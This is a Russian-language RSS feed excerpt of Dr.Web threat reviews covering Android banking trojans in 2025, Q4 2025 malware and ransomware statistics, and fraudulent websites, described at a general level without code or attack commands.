&lt;p&gt;Жителей многих стран Юго-Восточной Азии и Азиатско-Тихоокеанского региона, в том числе Индонезии и Южной Кореи, атаковал троян &lt;b&gt;Android.BankBot.Remo.1.origin&lt;/b&gt;. Эта вредоносная программа использует специальные возможности (Accessibility Services) для кражи данных из установленных на зараженных устройствах приложений банков и криптокошельков. Помимо трояна Remo, южнокорейские пользователи также сталкивались с троянами &lt;b&gt;Android.BankBot.15140&lt;/b&gt;, &lt;b&gt;Android.BankBot.Ermac.6.origin&lt;/b&gt; и GoldDigger (&lt;b&gt;Android.BankBot.GoldDigger.9&lt;/b&gt;, &lt;b&gt;Android.BankBot.GoldDigger.11&lt;/b&gt;).&lt;/p&gt;

&lt;p&gt;Вредоносные программы GoldDigger применялись и против индонезийских и тайских пользователей. А банковский троян &lt;b&gt;Android.BankBot.Gigabud.1.origin&lt;/b&gt; использовался против клиентов кредитных организаций Индонезии и Малайзии. В то же время злоумышленники продолжили применять троянов MoqHao при атаках на японскую аудиторию. Распространение получили такие модификации MoqHao как &lt;b&gt;Android.Banker.672.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.5063&lt;/b&gt;, &lt;b&gt;Android.Banker.740.origin&lt;/b&gt; и ряд других.&lt;/p&gt;

&lt;p&gt;Одним из банковских троянов, нацеленных на жителей Индии, стал &lt;b&gt;Android.Banker.6209&lt;/b&gt;. Троян имитирует внешний вид настоящих банковских приложений с целью кражи данных пользователей — их имен, номеров банковских карт и CVV-кодов безопасности. Кроме того, он использует зараженные устройства для скрытой добычи криптовалюты Monero. Распространение вновь получили банковские трояны RewardSteal, такие как &lt;b&gt;Android.Banker.814.origin&lt;/b&gt;, &lt;b&gt;Android.Banker.913.origin&lt;/b&gt; и &lt;b&gt;Android.Banker.5132&lt;/b&gt;. Для кражи банковских данных они маскируются под ПО, якобы имеющее отношение к индийским кредитным организациям — например, ICICI, SBI, Axis и PM Kisan.&lt;/p&gt;

&lt;p&gt;Бразильских владельцев Android-устройств чаще всего атаковали вредоносные программы &lt;b&gt;Android.BankBot.1183.origin&lt;/b&gt;, а также ряд представителей семейства NGate — &lt;b&gt;Android.Banker.NGate.8&lt;/b&gt;, &lt;b&gt;Android.Banker.NGate.9&lt;/b&gt; и &lt;b&gt;Android.Banker.NGate.14&lt;/b&gt;.&lt;/p&gt;

&lt;p&gt;В 2025 году вирусописатели продолжили использовать различные техники защиты банковских Android-троянов от анализа и детектирования. Например, распространение получили всевозможные методы обфускации и сокрытия кода, такие как DEX to C (конвертация исполняемого DEX-кода в код языка C), а также обфускация вредоносных приложений при помощи инструмента NP Manager.&lt;/p&gt;

&lt;p&gt;Популярными остались техники манипуляции с форматом ZIP-архивов, которыми фактически являются APK-файлы Android-приложений. Среди них — манипуляция с полями &lt;span class="string"&gt;compression method&lt;/span&gt; и &lt;span class="string"&gt;compressed size&lt;/span&gt; в структуре заголовка локального файла внутри APK, а также использование некорректных данных о диске в записи ECDR и CD. Подробнее о них мы рассказывали в &lt;a href="https://news.drweb.kz/show/review/?i=14970#troj" target="_blank"&gt;прошлом обзоре&lt;/a&gt; в разделе о банковских троянах. После таких манипуляций троянские программы остаются полностью работоспособными, но многие инструменты статического анализа воспринимают их как поврежденные и неспособны обработать корректно.&lt;/p&gt;

&lt;p&gt;Вирусописатели стали активнее применять программы-дропперы для сокрытия основной полезной нагрузки, например, для обхода внутренней защиты каталога Google Play. Киберпреступники также используют ИИ-ассистентов при написании кода банковских троянов, что упрощает их разработку и ведет к появлению новых семейств. Кроме того, злоумышленники чаще используют Telegram-боты для управления банковскими троянами и эксфильтрации данных с зараженных устройств.&lt;/p&gt;

&lt;h3&gt;Перспективы и тенденции&lt;/h3&gt;

&lt;p&gt;В 2025 году мы наблюдали высокую активность рекламных троянов, которые остаются самыми распространенными угрозами для ОС Android. Широкое распространение вновь получили и различные программы-подделки, которые используются в мошеннических целях, в том числе — для фишинга и кражи денег. Кроме того, продолжился рост числа атак с использованием банковских троянов. Все эти вредоносные приложения являются источником нелегального дохода для киберпреступников, поэтому их популярность остается на высоком уровне. В следующем году они с высокой долей вероятности вновь станут одними из популярных инструментов заработка злоумышленников. При этом вирусописатели все чаще используют Telegram-боты для управления банковскими троянами. Эта тенденция, скорее всего, продолжится.&lt;/p&gt;

&lt;p&gt;Появление вредоносной программы &lt;a href="https://vms.drweb.kz/search/?q=Android.Clipper.31&amp;lng=kk"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, а также новых версий троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.Vo1d&amp;lng=kk"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.Triada&amp;lng=kk"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; в прошивках смартфонов и TV-приставок говорит о сохраняющемся интересе злоумышленников в распространении вредоносного ПО способами, которые значительно усложняют его обнаружение. Весьма вероятно, что в новом году тенденция сохранится, и мы увидим новые случаи предустановки вредоносных приложений на смартфоны, ТВ-приставки и другие типы Android-устройств.&lt;/p&gt;

&lt;p&gt;Следует также ожидать появления более сложных вредоносных программ, способных выполнять широкий спектр задач. Среди них могут быть очередные бэкдоры и различные трояны-шпионы. Кроме того, вирусописатели наверняка вновь будут использовать официальные каталоги программ, в том числе Google Play, для размещения в них вредоносного и нежелательного ПО.&lt;/p&gt;

&lt;p&gt;Злоумышленники также продолжат внедрять различные способы защиты для создаваемых ими инструментов. Также они будут чаще использовать ИИ-помощников при написании кода, в результате чего стоит ожидать появления большего числа новых семейств.&lt;/p&gt;

&lt;p&gt;Компания «Доктор Веб» следит за ландшафтом угроз в мобильном сегменте и оперативно реагирует на возникающие вызовы. Пользователям Android мы рекомендуем установить Dr.Web Security Space для мобильных устройств, чтобы защитить себя от вредоносных и других опасных программ.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Индикаторы компрометации&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15099&amp;lng=kk</guid><title>«Доктор Веб»: обзор вирусной активности в IV квартале 2025 года</title><link>https://news.drweb.kz/show/?i=15099&amp;lng=kk&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;12 января 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Согласно статистике детектирований антивируса Dr.Web, в IV квартале 2025 года общее число обнаруженных угроз увеличилось на 16,05% по сравнению с III кварталом. Число уникальных угроз при этом снизилось на 1,13%. Наибольшее распространение получили нежелательные рекламные приложения, вредоносные скрипты и различные вредоносные программы, в том числе загрузчики и рекламные трояны.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;В почтовом трафике чаще всего детектировались троянские приложения, среди которых были загрузчики, похитители паролей и дропперы. Кроме того, через электронные письма распространялись эксплойты, бэкдоры и всевозможные вредоносные скрипты.&lt;/p&gt;

&lt;p&gt;Пользователи, чьи файлы были затронуты троянами-шифровальщиками, чаще всего сталкивались с энкодерами &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Trojan.Encoder.29750&amp;lng=kk"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;В октябре мы &lt;a href="https://news.drweb.kz/show/?i=15076" target="_blank"&gt;рассказали&lt;/a&gt; о бэкдоре для Android-устройств &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, которого киберпреступники распространяют в составе модифицированных версий мессенджера Telegram X. Эта вредоносная программа похищает логины и пароли от учетных записей Telegram и другие конфиденциальные данные. С ее помощью вирусописатели могут управлять взломанными аккаунтами жертв и полностью контролировать сам мессенджер, выполняя различные действия от имени пользователей.&lt;/p&gt;

&lt;p&gt;В ноябре наша антивирусная лаборатория опубликовала &lt;a href="https://news.drweb.kz/show/?i=15078" target="_blank"&gt;исследование&lt;/a&gt; таргетированной атаки, совершенной хакерской группировкой Cavalry Werewolf на российское государственное учреждение. В ходе проведенной экспертизы специалисты «Доктор Веб» выявили множество вредоносных инструментов злоумышленников, в том числе инструменты с открытым исходным кодом, которые киберпреступники применяют в своих кампаниях. Были также изучены особенности группировки и характерные для нее действия внутри скомпрометированных сетей.&lt;/p&gt;

&lt;p&gt;Уже в декабре на нашем сайте вышел &lt;a href="https://news.drweb.kz/show/?i=15090" target="_blank"&gt;материал&lt;/a&gt; об уникальном трояне &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire&amp;lng=kk"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, который «накручивает» популярность сайтов и для этого притворяется человеком, чтобы его действия не заблокировала антибот-защита интернет-площадок. Вредоносная программа самостоятельно ищет нужные сайты в поисковых системах, открывает их и выполняет клики на веб-страницах в соответствии с получаемыми от злоумышленников параметрами. &lt;a href="https://vms.drweb.kz/search/?q=Trojan.ChimeraWire&amp;lng=kk"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; попадает на компьютеры в результате работы нескольких вредоносных приложений, которые эксплуатируют уязвимости класса DLL Search Order Hijacking, а также используют антиотладочные приемы, чтобы избежать обнаружения.&lt;/p&gt;

&lt;p&gt;В течение IV квартала интернет-аналитики «Доктор Веб» зафиксировали новые мошеннические сайты, которые сулили потенциальным жертвам быстрый и легкий заработок. Также были выявлены очередные фишинговые интернет-ресурсы и поддельные сайты маркетплейсов.&lt;/p&gt;

&lt;p&gt;Наши специалисты обнаружили очередные вредоносные программы в каталоге Google Play. Среди них трояны &lt;a href="https://vms.drweb.kz/search/?q=Android.Joker&amp;lng=kk"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, которые подписывают владельцев Android-устройств на платные услуги, а также вредоносные приложения &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;, которые злоумышленники используют в различных мошеннических схемах. В то же время статистика детектирований Dr.Web Security Space для мобильных устройств показала рост активности банковских троянов для платформы Android.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции IV квартала&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Увеличение числа угроз, детектируемых на защищаемых устройствах&lt;/li&gt;
        &lt;li&gt;Снижение числа уникальных угроз, использованных при атаках&lt;/li&gt;
        &lt;li&gt;Рост количества запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками&lt;/li&gt;
        &lt;li&gt;Возросшая активность банковских троянов, нацеленных на владельцев Android-устройств&lt;/li&gt;
        &lt;li&gt;Распространение бэкдора &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, взламывающего учетные записи Telegram пользователей Android&lt;/li&gt;
        &lt;li&gt;Появление новых вредоносных приложений в каталоге Google Play&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным сервиса статистики «Доктор Веб»&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/01_stat_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы IV квартала 2025 года&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламное ПО, выступающее в роли промежуточного установщика пиратских программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт, который в бесконечном цикле ищет окна с текстом &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; и &lt;span class="string"&gt;розробника&lt;/span&gt; и шлет им событие нажатия кнопки Escape, принудительно закрывая их.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4268&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Siggen.33379&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Поддельный браузерный блокировщик рекламы Adblock Plus, который устанавливается в систему другими вредоносными приложениями с целью показа рекламы.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Статистика вредоносных программ в почтовом трафике&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/02_mail_traffic_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы в почтовом трафике IV квартала 2025 года&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Детектирование упакованной версии троянской программы &lt;a href="https://vms.drweb.kz/search/?q=Trojan.AutoIt.289&amp;lng=kk"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt;, написанной на скриптовом языке AutoIt. Она распространяется в составе группы из нескольких вредоносных приложений: майнера, бэкдора и модуля для самостоятельного распространения. &lt;a href="https://vms.drweb.kz/search/?q=Trojan.AutoIt.289&amp;lng=kk"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; выполняет различные вредоносные действия, затрудняющие обнаружение основной полезной нагрузки.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.791&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный сценарий на языке JavaScript, формирующий фишинговую веб-страницу.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Шифровальщики&lt;/h3&gt;

&lt;p&gt;В IV квартале 2025 года число запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками, увеличилось на 1,15% по сравнению с III кварталом.&lt;/p&gt;

&lt;p&gt;Динамика поступления запросов на расшифровку в Службу технической поддержки «Доктор Веб»:&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные энкодеры IV квартала 2025 года&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 24,90% обращений пользователей&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 4,21% обращений пользователей&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Encoder.29750&amp;lng=kk"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3,42% обращений пользователей&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.kz/search/?q=Trojan.Encoder.26996&amp;lng=kk"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 2,68% обращений пользователей&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356 &lt;/b&gt; — 0,38% обращений пользователей&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Сетевое мошенничество&lt;/h3&gt;

&lt;p&gt;В течение IV квартала 2025 года интернет-аналитики «Доктор Веб» отметили появление новых поддельных сайтов маркетплейсов. Мошенники якобы от имени торговых площадок предлагают потенциальным жертвам сыграть в игру типа «карусель» (аналог рулетки) с шансом получить приз. После нескольких попыток пользователю «везет», но для получения выигрыша от него якобы сначала требуется оплатить доставку, затем страховку, налог и т. д. В некоторых случаях жертве сообщают, что искомый товар отсутствует, и ей предлагают обменять товар на деньги. Однако для их получения необходима оплата «пошлины». Если пользователь соглашается, от него вновь требуют дополнительных платежей в виде страховки, активации некоего счета и т. п.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Пример поддельного сайта маркетплейса, предлагающего «розыгрыш призов»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;В базу нерекомендуемых и вредоносных сайтов также были добавлены очередные интернет-ресурсы, на которых мошенники продают несуществующие театральные билеты. На таких сайтах предлагается посетить популярные постановки, в том числе по привлекательным ценам. Однако после оплаты жертвы не получают желаемые билеты и фактически отдают мошенникам деньги.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Один из мошеннических сайтов по продаже несуществующих театральных билетов&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Также были обнаружены очередные ресурсы, которые имитируют сайты частных кинотеатров и предлагают приобрести билеты для просмотра фильмов. Никаких билетов после покупки на таких площадках жертвы в итоге не получают.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт частного кинотеатра&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Наши специалисты выявили ряд фишинговых ресурсов, среди которых были поддельные сайты сервиса Steam. С их помощью злоумышленники пытались получить данные учетных записей пользователей, предлагая тем указать логин и пароль для аутентификации.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Фишинговый сайт, который имитирует настоящий интернет-портал Steam и предлагает потенциальной жертве войти в свою учетную запись&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Кроме того, мошенники вновь заманивали потенциальных жертв в несуществующие инвестиционные проекты. Один из выявленных сайтов предлагал русскоязычным пользователям в Америке вложить 250$ в проект под названием Federal Invest и «зарабатывать до 90 000 долларов за три месяца». Данный проект якобы был создан в том числе при участии Дональда Трампа.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт, предлагающий принять участие в «выгодном инвестиционном проекте»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Другой сайт сообщал о том, что узбекские пользователи имеют возможность получать от 15 00 000 узбекских сум уже в первый месяц после присоединения к рекламируемому проекту, якобы имеющему отношение к крупному холдингу.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.kz/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт, обещающий жителям Узбекистана крупную прибыль от участия в «инвестиционном проекте»&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="http://antifraud.drweb.com/dangerous_urls/"&gt;Узнайте больше о нерекомендуемых Dr.Web сайтах&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Вредоносное и нежелательное ПО для мобильных устройств&lt;/h3&gt;

&lt;p&gt;По данным статистики детектирований Dr.Web Security Space для мобильных устройств, в IV квартале 2025 года самыми распространенными Android-угрозами, несмотря на снижение активности, вновь оказались рекламные трояны &lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;. На третье место поднялись вредоносные приложения семейства &lt;b&gt;Android.Siggen&lt;/b&gt;, которые обладают различной функциональностью. В течение минувших 3 месяцев возросла активность банковских троянов, при этом наибольший рост среди них показали представители семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.Banker&amp;lng=kk"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Наиболее распространенным нежелательным ПО стали программы &lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;, модифицированные через облачный сервис CloudInject. Среди потенциально опасного ПО наибольшая активность наблюдалась со стороны приложений &lt;b&gt;Tool.NPMod&lt;/b&gt;, модифицированных при помощи инструмента NP Manager. Самыми распространенными рекламными программами оказались модули &lt;a href="https://vms.drweb.kz/search/?q=Adware.Adpush&amp;lng=kk"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt;, которые разработчики встраивают в Android-программы.&lt;/p&gt;

&lt;p&gt;В октябре компания «Доктор Веб» &lt;a href="https://news.drweb.kz/show/?i=15076" target="_blank"&gt;опубликовала&lt;/a&gt; сведения об опасном бэкдоре &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, внедренном злоумышленниками в модификации мессенджера Telegram X. Вредоносная программа похищает конфиденциальную информацию и позволяет управлять учетной записью жертвы, а также непосредственно контролировать мессенджер, меняя логику его работы.&lt;/p&gt;

&lt;p&gt;В течение IV квартала наши вирусные аналитики обнаружили в каталоге Google Play очередные угрозы, среди которых были трояны &lt;a href="https://vms.drweb.kz/search/?q=Android.Joker&amp;lng=kk"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, которые подписывают пользователей на платные услуги, а также используемые в мошеннических целях вредоносные приложения &lt;a href="https://vms.drweb.kz/search/?q=Android.FakeApp&amp;lng=kk"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Наиболее заметные события, связанные с «мобильной» безопасностью в IV квартале&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Рекламные трояны остались самыми распространенными угрозами для Android-устройств&lt;/li&gt;
    &lt;li&gt;Возросла активность банковских троянов &lt;a href="https://vms.drweb.kz/search/?q=Android.Banker&amp;lng=kk"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;В сторонних модификациях мессенджера Telegram X был обнаружен опасный бэкдор &lt;a href="https://vms.drweb.kz/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=kk"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;&lt;/li&gt;
    &lt;li&gt;В каталоге Google Play появились новые вредоносные приложения&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Более подробно о вирусной обстановке для мобильных устройств в IV квартале 2025 года читайте в нашем &lt;a href="https://news.drweb.kz/show/?i=15101" target="_blank"&gt;обзоре&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.kz/show/?i=15101&amp;lng=kk</guid><title>«Доктор Веб»: обзор вирусной активности для мобильных устройств в IV квартале 2025 года</title><link>https://news.drweb.kz/show/?i=15101&amp;lng=kk&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;12 января 2026 года&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Согласно данным статистики детектирований Dr.Web Security Space для мобильных устройств, в IV квартале 2025 года самыми распространенными Android-угрозами вновь стали рекламные трояны &lt;a href="https://vms.drweb.kz/search/?q=Android.MobiDash&amp;lng=kk"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; и &lt;a href="https://vms.drweb.kz/search/?q=Android.HiddenAds&amp;lng=kk"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, демонстрирующие надоедливые объявления. При этом их активность снизилась: первые обнаруживались на защищаемых устройствах на 43,24% реже, а вторые — на 18,06%. За ними расположились трояны семейства &lt;b&gt;Android.Siggen&lt;/b&gt;, которые включают вредоносные приложения, обладающие различной функциональностью. Они также детектировались несколько реже — на 27,47%.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;В то же время отмечался заметный рост активности банковских троянов, с которыми пользователи сталкивались чаще на 65,52%. Этот рост произошел в большей степени за счет представителей семейства &lt;a href="https://vms.drweb.kz/search/?q=Android.Banker&amp;lng=kk"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Такие вредоносные программы перехватывают СМС с одноразовыми кодами для подтверждения банковских операций, а также могут имитировать внешний вид настоящего банковского ПО и демонстрировать фишинговые окна.&lt;/p&gt;

&lt;p&gt;Среди нежелательного ПО наибольшее распространение получили Android-программы, модифицированные через облачный сервис CloudInject (антивирус Dr.Web детектирует их как &lt;a href="https://vms.drweb.kz/search/?q=Program.CloudInject&amp;lng=kk"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;). С его помощью в приложения добавляются опасные системные разрешения и обфусцированный код, функциональность которого невозможно проконтролировать. Кроме того, на устройствах часто встречались поддельные антивирусы &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeAntiVirus&amp;lng=kk"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, которые обнаруживают несуществующие угрозы и для их «лечения» требуют приобрести полную версию, а также &lt;a href="https://vms.drweb.kz/search/?q=Program.FakeMoney&amp;lng=kk"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt; — приложения, якобы позволяющие зарабатывать на выполнении различных заданий.&lt;/p&gt;

